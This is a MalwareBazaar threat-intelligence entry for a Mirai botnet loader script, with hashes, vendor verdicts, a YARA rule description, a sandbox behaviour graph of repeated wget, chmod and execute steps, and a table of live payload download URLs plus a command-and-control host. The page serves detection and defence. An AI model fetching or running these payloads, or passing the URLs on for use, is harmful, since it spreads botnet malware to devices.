MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 a08bbfe1428ccff19c582fdfb0d55ee2bc262caf59048a50dc0da5bf21a00d91. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 6


Intelligence 6 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: a08bbfe1428ccff19c582fdfb0d55ee2bc262caf59048a50dc0da5bf21a00d91
SHA3-384 hash: 2e34f91355741507ac949961f22af0baed3670988b2d0e088ad38996eec136eaf20688988dede1a9d3449a12fb52b194
SHA1 hash: 1a29c3c58dae3bce7bb943e31e7ca09339898d20
MD5 hash: df3f0c5380a52d6313b634a2e741cc45
humanhash: maryland-victor-north-summer
File name:wget.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:935 bytes
First seen:2025-12-25 09:58:18 UTC
Last seen:2025-12-25 22:41:12 UTC
File type: sh
MIME type:text/plain
ssdeep 12:Gw3XHNIBS+CoKSrVxHX+MYl9AXY9o3TxykF66hyrQkn:GSHNIIKKSrL3zYl9AI9WhdOQkn
TLSH T1EB119ED921905C3948EACC0D32E58808963BD58979619F2DDEFD442B40E7AB87F6CE8D
Magika shell
Reporter abuse_ch
Tags:mirai sh
URLMalware sample (SHA256 hash)SignatureTags
http://190.123.46.72/bins/main_arm0b423d1b9e7a9e6719bf77dfa5363998d04f9edad2ee8e2de911c7ae995a391a Miraielf mirai ua-wget
http://190.123.46.72/bins/main_arm55d94992dac0b6d592f86b0d59af84c52168f05d7aa1713a0c4fd62820be71630 Miraielf mirai ua-wget
http://190.123.46.72/bins/main_arm65b1cf87888710837c0007fd20877644abec191d7fed82763a15b959d591444d4 Miraielf mirai ua-wget
http://190.123.46.72/bins/main_arm7cf40305398ee234528ebd18bb54b13e1bb94f90a501636857e25ba114bb1c9c6 Miraielf mirai ua-wget
http://190.123.46.72/bins/main_sh4fd893a3ee002cd623137b4f65fda5624232eb22e53f5fec40601bc26e7eed29a Miraielf mirai ua-wget
http://190.123.46.72/bins/main_m68k7cca33815eaccd864db722658cce4a234c32280e2ee7266c9fecd8601652c95f Miraielf mirai ua-wget
http://190.123.46.72/bins/main_mips261cbea15e9c316a7a13d6ee7c496feb4364d264355821dc03664c17f398bcd1 Miraielf mirai ua-wget
http://190.123.46.72/bins/main_mpsl2322a5098627d113e939e6ac7ddb5c80ed5e253a650c6b6e1737baa4617db415 Miraielf mirai ua-wget
http://190.123.46.72/bins/main_x86_646c22bec08f6ce62b43664b22028e033d496990b06a053c4aee5168b3af787c55 Miraielf mirai ua-wget
http://190.123.46.72/bins/main_ppcb1d611c59c43c5f2ae26da403ac6f4c59f721d91716cd5c07e3293351db8124c Miraielf mirai ua-wget
http://190.123.46.72/bins/main_x8605466e5727f528209cff95c2e7e2b197aa0fe4e312fd3709c13a1605c8cc2555 Miraielf mirai ua-wget

Intelligence

File Origin
# of uploads :
2
# of downloads :
33
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
bash lolbin mirai
Link:
https://www.filescan.io/uploads/694d0af1e126b9ff4390ede1/reports/6288e05c-5259-4b80-bc32-c6ec8273d1d7/overview
Verdict:
Clean
File Type:
text
Link:
https://opentip.kaspersky.com/a08bbfe1428ccff19c582fdfb0d55ee2bc262caf59048a50dc0da5bf21a00d91/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/72ca1be1-e39c-43a6-a34a-8381c1ff33df
Behavior Graph:
Download SVG
%3 guuid=8ec1fb40-1900-0000-0593-125a8d090000 pid=2445 /usr/bin/sudo guuid=096a4843-1900-0000-0593-125a93090000 pid=2451 /tmp/sample.bin guuid=8ec1fb40-1900-0000-0593-125a8d090000 pid=2445->guuid=096a4843-1900-0000-0593-125a93090000 pid=2451 execve guuid=99ae9143-1900-0000-0593-125a95090000 pid=2453 /usr/bin/wget dns net send-data write-file guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=99ae9143-1900-0000-0593-125a95090000 pid=2453 execve guuid=e0fc7873-1900-0000-0593-125aeb090000 pid=2539 /usr/bin/chmod guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=e0fc7873-1900-0000-0593-125aeb090000 pid=2539 execve guuid=7df1c173-1900-0000-0593-125aec090000 pid=2540 /usr/bin/dash guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=7df1c173-1900-0000-0593-125aec090000 pid=2540 clone guuid=198d5674-1900-0000-0593-125aef090000 pid=2543 /usr/bin/wget dns net send-data write-file guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=198d5674-1900-0000-0593-125aef090000 pid=2543 execve guuid=a16133a4-1900-0000-0593-125a640a0000 pid=2660 /usr/bin/chmod guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=a16133a4-1900-0000-0593-125a640a0000 pid=2660 execve guuid=bd8c84a4-1900-0000-0593-125a660a0000 pid=2662 /usr/bin/dash guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=bd8c84a4-1900-0000-0593-125a660a0000 pid=2662 clone guuid=13fb20a5-1900-0000-0593-125a6a0a0000 pid=2666 /usr/bin/wget dns net send-data write-file guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=13fb20a5-1900-0000-0593-125a6a0a0000 pid=2666 execve guuid=7ec178d5-1900-0000-0593-125ac90a0000 pid=2761 /usr/bin/chmod guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=7ec178d5-1900-0000-0593-125ac90a0000 pid=2761 execve guuid=5770f2d5-1900-0000-0593-125aca0a0000 pid=2762 /usr/bin/dash guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=5770f2d5-1900-0000-0593-125aca0a0000 pid=2762 clone guuid=82e5d8d6-1900-0000-0593-125ace0a0000 pid=2766 /usr/bin/wget dns net send-data write-file guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=82e5d8d6-1900-0000-0593-125ace0a0000 pid=2766 execve guuid=e9509f3b-1a00-0000-0593-125a360b0000 pid=2870 /usr/bin/chmod guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=e9509f3b-1a00-0000-0593-125a360b0000 pid=2870 execve guuid=efc0f13b-1a00-0000-0593-125a380b0000 pid=2872 /usr/bin/dash guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=efc0f13b-1a00-0000-0593-125a380b0000 pid=2872 clone guuid=bac3aa3c-1a00-0000-0593-125a3c0b0000 pid=2876 /usr/bin/wget dns net send-data write-file guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=bac3aa3c-1a00-0000-0593-125a3c0b0000 pid=2876 execve guuid=310b766c-1a00-0000-0593-125a870b0000 pid=2951 /usr/bin/chmod guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=310b766c-1a00-0000-0593-125a870b0000 pid=2951 execve guuid=37d4146d-1a00-0000-0593-125a880b0000 pid=2952 /usr/bin/dash guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=37d4146d-1a00-0000-0593-125a880b0000 pid=2952 clone guuid=3cd3466e-1a00-0000-0593-125a8a0b0000 pid=2954 /usr/bin/wget dns net send-data write-file guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=3cd3466e-1a00-0000-0593-125a8a0b0000 pid=2954 execve guuid=9bc0b8a7-1a00-0000-0593-125af70b0000 pid=3063 /usr/bin/chmod guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=9bc0b8a7-1a00-0000-0593-125af70b0000 pid=3063 execve guuid=8cca28a8-1a00-0000-0593-125af90b0000 pid=3065 /usr/bin/dash guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=8cca28a8-1a00-0000-0593-125af90b0000 pid=3065 clone guuid=d709f1a8-1a00-0000-0593-125afc0b0000 pid=3068 /usr/bin/wget dns net send-data write-file guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=d709f1a8-1a00-0000-0593-125afc0b0000 pid=3068 execve guuid=165745e1-1a00-0000-0593-125a6a0c0000 pid=3178 /usr/bin/chmod guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=165745e1-1a00-0000-0593-125a6a0c0000 pid=3178 execve guuid=2f1faee1-1a00-0000-0593-125a6c0c0000 pid=3180 /usr/bin/dash guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=2f1faee1-1a00-0000-0593-125a6c0c0000 pid=3180 clone guuid=315442e4-1a00-0000-0593-125a6f0c0000 pid=3183 /usr/bin/wget dns net send-data write-file guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=315442e4-1a00-0000-0593-125a6f0c0000 pid=3183 execve guuid=4e6f121d-1b00-0000-0593-125aa90c0000 pid=3241 /usr/bin/chmod guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=4e6f121d-1b00-0000-0593-125aa90c0000 pid=3241 execve guuid=1715821d-1b00-0000-0593-125aaa0c0000 pid=3242 /usr/bin/dash guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=1715821d-1b00-0000-0593-125aaa0c0000 pid=3242 clone guuid=3d4b1a1f-1b00-0000-0593-125aac0c0000 pid=3244 /usr/bin/wget dns net send-data write-file guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=3d4b1a1f-1b00-0000-0593-125aac0c0000 pid=3244 execve guuid=cdc2e050-1b00-0000-0593-125ad70c0000 pid=3287 /usr/bin/chmod guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=cdc2e050-1b00-0000-0593-125ad70c0000 pid=3287 execve guuid=65895a51-1b00-0000-0593-125ad80c0000 pid=3288 /home/sandbox/main_x86_64 delete-file net guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=65895a51-1b00-0000-0593-125ad80c0000 pid=3288 execve guuid=17e99551-1b00-0000-0593-125ada0c0000 pid=3290 /usr/bin/wget dns net send-data write-file guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=17e99551-1b00-0000-0593-125ada0c0000 pid=3290 execve guuid=6b409883-1b00-0000-0593-125a230d0000 pid=3363 /usr/bin/chmod guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=6b409883-1b00-0000-0593-125a230d0000 pid=3363 execve guuid=bf870f84-1b00-0000-0593-125a240d0000 pid=3364 /usr/bin/dash guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=bf870f84-1b00-0000-0593-125a240d0000 pid=3364 clone guuid=9496d084-1b00-0000-0593-125a260d0000 pid=3366 /usr/bin/wget dns net send-data write-file guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=9496d084-1b00-0000-0593-125a260d0000 pid=3366 execve guuid=586cabaa-1b00-0000-0593-125a710d0000 pid=3441 /usr/bin/chmod guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=586cabaa-1b00-0000-0593-125a710d0000 pid=3441 execve guuid=172b33ab-1b00-0000-0593-125a730d0000 pid=3443 /home/sandbox/main_x86 delete-file net guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=172b33ab-1b00-0000-0593-125a730d0000 pid=3443 execve guuid=034974ab-1b00-0000-0593-125a750d0000 pid=3445 /usr/bin/rm delete-file guuid=096a4843-1900-0000-0593-125a93090000 pid=2451->guuid=034974ab-1b00-0000-0593-125a750d0000 pid=3445 execve 4f6baed0-9587-596c-82b3-fd721afe4cc1 10.0.2.3:53 guuid=99ae9143-1900-0000-0593-125a95090000 pid=2453->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 88B dafb67d5-df68-55a8-a871-37e37b4e86bd 190.123.46.72:80 guuid=99ae9143-1900-0000-0593-125a95090000 pid=2453->dafb67d5-df68-55a8-a871-37e37b4e86bd send: 141B guuid=198d5674-1900-0000-0593-125aef090000 pid=2543->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 88B guuid=198d5674-1900-0000-0593-125aef090000 pid=2543->dafb67d5-df68-55a8-a871-37e37b4e86bd send: 142B guuid=13fb20a5-1900-0000-0593-125a6a0a0000 pid=2666->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 88B guuid=13fb20a5-1900-0000-0593-125a6a0a0000 pid=2666->dafb67d5-df68-55a8-a871-37e37b4e86bd send: 142B guuid=82e5d8d6-1900-0000-0593-125ace0a0000 pid=2766->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 88B guuid=82e5d8d6-1900-0000-0593-125ace0a0000 pid=2766->dafb67d5-df68-55a8-a871-37e37b4e86bd send: 142B guuid=bac3aa3c-1a00-0000-0593-125a3c0b0000 pid=2876->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 88B guuid=bac3aa3c-1a00-0000-0593-125a3c0b0000 pid=2876->dafb67d5-df68-55a8-a871-37e37b4e86bd send: 141B guuid=3cd3466e-1a00-0000-0593-125a8a0b0000 pid=2954->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 88B guuid=3cd3466e-1a00-0000-0593-125a8a0b0000 pid=2954->dafb67d5-df68-55a8-a871-37e37b4e86bd send: 142B guuid=d709f1a8-1a00-0000-0593-125afc0b0000 pid=3068->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 88B guuid=d709f1a8-1a00-0000-0593-125afc0b0000 pid=3068->dafb67d5-df68-55a8-a871-37e37b4e86bd send: 142B guuid=315442e4-1a00-0000-0593-125a6f0c0000 pid=3183->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 88B guuid=315442e4-1a00-0000-0593-125a6f0c0000 pid=3183->dafb67d5-df68-55a8-a871-37e37b4e86bd send: 142B guuid=3d4b1a1f-1b00-0000-0593-125aac0c0000 pid=3244->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 88B guuid=3d4b1a1f-1b00-0000-0593-125aac0c0000 pid=3244->dafb67d5-df68-55a8-a871-37e37b4e86bd send: 144B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=65895a51-1b00-0000-0593-125ad80c0000 pid=3288->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=1da88151-1b00-0000-0593-125ad90c0000 pid=3289 /home/sandbox/main_x86_64 dns net send-data zombie guuid=65895a51-1b00-0000-0593-125ad80c0000 pid=3288->guuid=1da88151-1b00-0000-0593-125ad90c0000 pid=3289 clone guuid=1da88151-1b00-0000-0593-125ad90c0000 pid=3289->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 33B b5fc0f9c-0bf2-54e3-b5e0-f32b946dd7e8 chmod0777kk.com:1995 guuid=1da88151-1b00-0000-0593-125ad90c0000 pid=3289->b5fc0f9c-0bf2-54e3-b5e0-f32b946dd7e8 send: 11B guuid=0a6fa651-1b00-0000-0593-125adb0c0000 pid=3291 /home/sandbox/main_x86_64 guuid=1da88151-1b00-0000-0593-125ad90c0000 pid=3289->guuid=0a6fa651-1b00-0000-0593-125adb0c0000 pid=3291 clone guuid=17e99551-1b00-0000-0593-125ada0c0000 pid=3290->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 88B guuid=17e99551-1b00-0000-0593-125ada0c0000 pid=3290->dafb67d5-df68-55a8-a871-37e37b4e86bd send: 141B guuid=9496d084-1b00-0000-0593-125a260d0000 pid=3366->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 88B guuid=9496d084-1b00-0000-0593-125a260d0000 pid=3366->dafb67d5-df68-55a8-a871-37e37b4e86bd send: 141B guuid=172b33ab-1b00-0000-0593-125a730d0000 pid=3443->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=878262ab-1b00-0000-0593-125a740d0000 pid=3444 /home/sandbox/main_x86 dns net send-data zombie guuid=172b33ab-1b00-0000-0593-125a730d0000 pid=3443->guuid=878262ab-1b00-0000-0593-125a740d0000 pid=3444 clone guuid=878262ab-1b00-0000-0593-125a740d0000 pid=3444->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 33B guuid=878262ab-1b00-0000-0593-125a740d0000 pid=3444->b5fc0f9c-0bf2-54e3-b5e0-f32b946dd7e8 send: 11B guuid=103a82ab-1b00-0000-0593-125a760d0000 pid=3446 /home/sandbox/main_x86 guuid=878262ab-1b00-0000-0593-125a740d0000 pid=3444->guuid=103a82ab-1b00-0000-0593-125a760d0000 pid=3446 clone
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/a08bbfe1428ccff19c582fdfb0d55ee2bc262caf59048a50dc0da5bf21a00d91
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/a08bbfe1428ccff19c582fdfb0d55ee2bc262caf59048a50dc0da5bf21a00d91/
Verdict:
Susipicious
Link:
https://tip.neiki.dev/file/a08bbfe1428ccff19c582fdfb0d55ee2bc262caf59048a50dc0da5bf21a00d91
Threat name:
Document-HTML.Downloader.Heuristic
Create hunting rule
Status:
Malicious
First seen:
2025-12-25 09:49:28 UTC
File Type:
Text (Shell)
AV detection:
13 of 24 (54.17%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=ucf37ykcrth7dhcyf7p3bvk64k6cmlfpleciuug4bws36inabwiq._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/251225-lzmsfssmdj/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/a08bbfe1428ccff19c582fdfb0d55ee2bc262caf59048a50dc0da5bf21a00d91

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Create hunting rule
Author:Anish Bogati
Description:Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference:MalwareBazaar sample lilin.sh

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh a08bbfe1428ccff19c582fdfb0d55ee2bc262caf59048a50dc0da5bf21a00d91

(this sample)

Mirai

elf 0b423d1b9e7a9e6719bf77dfa5363998d04f9edad2ee8e2de911c7ae995a391a

  
URLhaus
https://urlhaus.abuse.ch/url/3743194/
  
Delivery method
Distributed via web download
  
Dropping
MD5 994af88b29ff2e3d59e6f45a01cd710b
  
Dropping
SHA256 0b423d1b9e7a9e6719bf77dfa5363998d04f9edad2ee8e2de911c7ae995a391a

Comments